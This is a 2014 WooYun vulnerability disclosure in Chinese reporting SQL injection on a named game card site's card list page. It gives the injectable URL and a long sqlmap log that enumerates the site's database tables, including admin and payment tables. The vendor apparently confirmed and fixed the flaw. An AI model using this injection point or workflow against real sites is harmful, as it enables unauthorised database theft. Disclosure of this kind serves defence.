当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078618

漏洞标题:某大型游戏网站点卡核心SQL注射全库泄露游戏卡号密码泄露

相关厂商:2366.com

漏洞作者: 路人甲

提交时间:2014-10-09 15:35

修复时间:2014-11-23 15:36

公开时间:2014-11-23 15:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-09: 细节已通知厂商并且等待厂商处理中
2014-10-09: 厂商已经确认,细节仅向厂商公开
2014-10-19: 细节向核心白帽子及相关领域专家公开
2014-10-29: 细节向普通白帽子公开
2014-11-08: 细节向实习白帽子公开
2014-11-23: 细节向公众公开

简要描述:

某大型游戏网站点卡核心sql注射,全库泄露,游戏卡号密码泄露

详细说明:

某大型游戏网站点卡核心sql注射,全库泄露,游戏卡号密码泄露

漏洞证明:

注射地址:

http://ka.2366.com/cardlist_1.php?gid=4340&rcname=%E4%BC%9A%E5%A5%BD%E7%8E%A9


[13:47:39] [INFO] retrieved: uchome_poke
[13:47:39] [INFO] retrieved: my_2366_com
[13:47:40] [INFO] retrieved: uchome_poll
[13:47:40] [INFO] retrieved: my_2366_com
[13:47:40] [INFO] retrieved: uchome_pollfield
[13:47:41] [INFO] retrieved: my_2366_com
[13:47:41] [INFO] retrieved: uchome_polloption
[13:47:41] [INFO] retrieved: my_2366_com
[13:47:41] [INFO] retrieved: uchome_polluser
[13:47:42] [INFO] retrieved: my_2366_com
[13:47:42] [INFO] retrieved: uchome_post
[13:47:42] [INFO] retrieved: my_2366_com
[13:47:43] [INFO] retrieved: uchome_profield
[13:47:43] [INFO] retrieved: my_2366_com
[13:47:43] [INFO] retrieved: uchome_profilefield
[13:47:44] [INFO] retrieved: my_2366_com
[13:47:44] [INFO] retrieved: uchome_property
[13:47:45] [INFO] retrieved: my_2366_com
[13:47:45] [INFO] retrieved: uchome_property_game
[13:47:45] [INFO] retrieved: my_2366_com
[13:47:47] [INFO] retrieved: uchome_property_value
[13:47:47] [INFO] retrieved: my_2366_com
[13:47:48] [INFO] retrieved: uchome_report
[13:47:48] [INFO] retrieved: my_2366_com
[13:47:49] [INFO] retrieved: uchome_security
[13:47:49] [INFO] retrieved: my_2366_com
[13:47:50] [INFO] retrieved: uchome_session
[13:47:51] [INFO] retrieved: my_2366_com
[13:47:52] [INFO] retrieved: uchome_share
[13:47:53] [INFO] retrieved: my_2366_com
[13:47:53] [INFO] retrieved: uchome_show
[13:47:53] [INFO] retrieved: my_2366_com
[13:47:54] [INFO] retrieved: uchome_space
[13:47:54] [INFO] retrieved: my_2366_com
[13:47:54] [INFO] retrieved: uchome_spacefield
[13:47:54] [INFO] retrieved: my_2366_com
[13:47:55] [INFO] retrieved: uchome_spaceinfo
[13:47:55] [INFO] retrieved: my_2366_com
[13:47:55] [INFO] retrieved: uchome_spacelog
[13:47:56] [INFO] retrieved: my_2366_com
[13:47:56] [INFO] retrieved: uchome_stat
[13:47:56] [INFO] retrieved: my_2366_com
[13:47:57] [INFO] retrieved: uchome_statuser
[13:47:57] [INFO] retrieved: my_2366_com
[13:47:57] [INFO] retrieved: uchome_tag
[13:47:58] [INFO] retrieved: my_2366_com
[13:47:58] [INFO] retrieved: uchome_tagblog
[13:47:58] [INFO] retrieved: my_2366_com
[13:47:59] [INFO] retrieved: uchome_tagspace
[13:48:00] [INFO] retrieved: my_2366_com
[13:48:01] [INFO] retrieved: uchome_task
[13:48:02] [INFO] retrieved: my_2366_com
[13:48:03] [INFO] retrieved: uchome_thread
[13:48:04] [INFO] retrieved: my_2366_com
[13:48:10] [INFO] retrieved: uchome_topic
[13:48:10] [INFO] retrieved: my_2366_com
[13:48:13] [INFO] retrieved: uchome_topicuser
[13:48:16] [INFO] retrieved: my_2366_com
[13:48:16] [INFO] retrieved: uchome_userapp
[13:48:16] [INFO] retrieved: my_2366_com
[13:48:17] [INFO] retrieved: uchome_userappfield
[13:48:17] [INFO] retrieved: my_2366_com
[13:48:17] [INFO] retrieved: uchome_userevent
[13:48:17] [INFO] retrieved: my_2366_com
[13:48:18] [INFO] retrieved: uchome_usergroup
[13:48:18] [INFO] retrieved: my_2366_com
[13:48:18] [INFO] retrieved: uchome_userlog
[13:48:19] [INFO] retrieved: my_2366_com
[13:48:19] [INFO] retrieved: uchome_usermagic
[13:48:19] [INFO] retrieved: my_2366_com
[13:48:19] [INFO] retrieved: uchome_usertask
[13:48:20] [INFO] retrieved: my_2366_com
[13:48:20] [INFO] retrieved: uchome_visitor
[13:48:20] [INFO] retrieved: my_2366_com
[13:48:21] [INFO] retrieved: uchome_wg_2366orders
[13:48:21] [INFO] retrieved: my_2366_com
[13:48:21] [INFO] retrieved: uchome_wg_admin_type
[13:48:22] [INFO] retrieved: my_2366_com
[13:48:22] [INFO] retrieved: uchome_wg_admin_user
[13:48:22] [INFO] retrieved: my_2366_com
[13:48:23] [INFO] retrieved: uchome_wg_bankorders
[13:48:23] [INFO] retrieved: my_2366_com
[13:48:23] [INFO] retrieved: uchome_wg_config
[13:48:23] [INFO] retrieved: my_2366_com
[13:48:24] [INFO] retrieved: uchome_wg_debugmember
[13:48:24] [INFO] retrieved: my_2366_com
[13:48:24] [INFO] retrieved: uchome_wg_game
[13:48:25] [INFO] retrieved: my_2366_com
[13:48:25] [INFO] retrieved: uchome_wg_gamelogin
[13:48:25] [INFO] retrieved: my_2366_com
[13:48:25] [INFO] retrieved: uchome_wg_gameserver
[13:48:26] [INFO] retrieved: my_2366_com
[13:48:26] [INFO] retrieved: uchome_wg_gametype
[13:48:26] [INFO] retrieved: my_2366_com
[13:48:26] [INFO] retrieved: uchome_wg_gameunit
[13:48:27] [INFO] retrieved: my_2366_com
[13:48:27] [INFO] retrieved: uchome_wg_invite
[13:48:28] [INFO] retrieved: my_2366_com
[13:48:28] [INFO] retrieved: uchome_wg_invite_group
[13:48:28] [INFO] retrieved: my_2366_com
[13:48:28] [INFO] retrieved: uchome_wg_invite_ip
[13:48:29] [INFO] retrieved: my_2366_com
[13:48:29] [INFO] retrieved: uchome_wg_invitelogs
[13:48:29] [INFO] retrieved: my_2366_com
[13:48:29] [INFO] retrieved: uchome_wg_kaifu
[13:48:30] [INFO] retrieved: my_2366_com
[13:48:30] [INFO] retrieved: uchome_wg_members_bank
[13:48:30] [INFO] retrieved: my_2366_com
[13:48:31] [INFO] retrieved: uchome_wg_paybank
[13:48:31] [INFO] retrieved: my_2366_com
[13:48:31] [INFO] retrieved: uchome_wg_paylogs
[13:48:32] [INFO] retrieved: my_2366_com
[13:48:32] [INFO] retrieved: uchome_wg_paysys
[13:48:32] [INFO] retrieved: my_2366_com
[13:48:32] [INFO] retrieved: uchome_wg_reggame
[13:48:33] [INFO] retrieved: my_2366_com
[13:48:33] [INFO] retrieved: uchome_wg_regserver
[13:48:33] [INFO] retrieved: my_2366_com
[13:48:33] [INFO] retrieved: uchome_wg_server_state
[13:48:34] [INFO] retrieved: my_2366_com
[13:48:34] [INFO] retrieved: uchome_wg_server_type
[13:48:34] [INFO] retrieved: my_2366_com
[13:48:35] [INFO] retrieved: uchome_wg_statetype
[13:48:35] [INFO] retrieved: my_2366_com
[13:48:35] [INFO] retrieved: uchome_wg_usergame
Database: my_2366_com
[123 tables]
+---------------------------------------+
| cardrungame                           |
| uchome_ad                             |
| uchome_adminsession                   |
| uchome_album                          |
| uchome_appcreditlog                   |
| uchome_artcontent                     |
| uchome_artdiyflag                     |
| uchome_arttype                        |
| uchome_blacklist                      |
| uchome_block                          |
| uchome_blog                           |
| uchome_blogfield                      |
| uchome_cache                          |
| uchome_card_company                   |
| uchome_card_game                      |
| uchome_card_killart                   |
| uchome_card_list                      |
| uchome_card_list1024                  |
| uchome_card_log                       |
| uchome_card_msg                       |
| uchome_card_msgreply                  |
| uchome_class                          |
| uchome_click                          |
| uchome_clickuser                      |
| uchome_comment                        |
| uchome_config                         |
| uchome_creditlog                      |
| uchome_creditrule                     |
| uchome_cron                           |
| uchome_data                           |
| uchome_docomment                      |
| uchome_doing                          |
| uchome_event                          |
| uchome_eventclass                     |
| uchome_eventfield                     |
| uchome_eventinvite                    |
| uchome_eventpic                       |
| uchome_feed                           |
| uchome_friend                         |
| uchome_friendguide                    |
| uchome_friendlog                      |
| uchome_invite                         |
| uchome_log                            |
| uchome_magic                          |
| uchome_magicinlog                     |
| uchome_magicstore                     |
| uchome_magicuselog                    |
| uchome_mailcron                       |
| uchome_mailqueue                      |
| uchome_member                         |
| uchome_mtag                           |
| uchome_mtaginvite                     |
| uchome_myapp                          |
| uchome_myinvite                       |
| uchome_notification                   |
| uchome_pic                            |
| uchome_picfield                       |
| uchome_placecontent                   |
| uchome_placepage                      |
| uchome_placetype                      |
| uchome_poke                           |
| uchome_poll                           |
| uchome_pollfield                      |
| uchome_polloption                     |
| uchome_polluser                       |
| uchome_post                           |
| uchome_profield                       |
| uchome_profilefield                   |
| uchome_property                       |
| uchome_property_game                  |
| uchome_property_value                 |
| uchome_report                         |
| uchome_security                       |
| uchome_session                        |
| uchome_share                          |
| uchome_show                           |
| uchome_space                          |
| uchome_spacefield                     |
| uchome_spaceinfo                      |
| uchome_spacelog                       |
| uchome_stat                           |
| uchome_statuser                       |
| uchome_tag                            |
| uchome_tagblog                        |
| uchome_tagspace                       |
| uchome_task                           |
| uchome_thread                         |
| uchome_topic                          |
| uchome_topicuser                      |
| uchome_userapp                        |
| uchome_userappfield                   |
| uchome_userevent                      |
| uchome_usergroup                      |
| uchome_userlog                        |
| uchome_usermagic                      |
| uchome_usertask                       |
| uchome_visitor                        |
| uchome_wg_2366orders                  |
| uchome_wg_admin_type                  |
| uchome_wg_admin_user                  |
| uchome_wg_bankorders                  |
| uchome_wg_config                      |
| uchome_wg_debugmember                 |
| uchome_wg_game                        |
| uchome_wg_gamelogin                   |
| uchome_wg_gameserver                  |
| uchome_wg_gametype                    |
| uchome_wg_gameunit                    |
| uchome_wg_invite                      |
| uchome_wg_invite_group                |
| uchome_wg_invite_ip                   |
| uchome_wg_invitelogs                  |
| uchome_wg_kaifu                       |
| uchome_wg_members_bank                |
| uchome_wg_paybank                     |
| uchome_wg_paylogs                     |
| uchome_wg_paysys                      |
| uchome_wg_reggame                     |
| uchome_wg_regserver                   |
| uchome_wg_server_state                |
| uchome_wg_server_type                 |
| uchome_wg_statetype                   |
| uchome_wg_usergame                    |
+---------------------------------------+
Current database
[5 tables]
+---------------------------------------+
| None                                  |
| None                                  |
| None                                  |
| None                                  |
| None                                  |
+---------------------------------------+
Database: information_schema
[23 tables]
+---------------------------------------+
| None                                  |
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
+---------------------------------------+
[13:48:35] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 11 times
[13:48:35] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\???
?\SQLMAP~3\Bin\output\ka.2366.com'
[*] shutting down at 13:48:35

修复方案:

紧急修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-10-09 18:16

厂商回复:

已处理,谢谢

最新状态:

2014-10-09:已修复

漏洞评价:

评论

  1. 2014-10-08 16:44 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    厂商已泄漏

  2. 2014-10-08 16:56 | 天朝城管 ( 普通白帽子 | Rank:116 漏洞数:35 | 不要等到命玩你的时候才开始玩命)

    已达到充值榜第一

  3. 2014-10-09 05:56 | 校长 ( 实习白帽子 | Rank:40 漏洞数:10 | 本人受《中华人民共和国未成年人保护法》《...)

    2366吗?

  4. 2014-10-09 15:57 | Jn· ( 路人 | Rank:30 漏洞数:14 | 本小菜很可爱,如果不服你TM来打我啊--哎呀...)

    已达到充值榜第一

  5. 2014-10-10 16:58 | 丸子哥 ( 路人 | Rank:0 漏洞数:1 | 我是来膜拜大家的)

    厂商泄露笑尿

  6. 2014-10-29 19:11 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @ Jn· 你为什么那么喜欢挑逗厂商啊,经常就大口说已脱裤之类的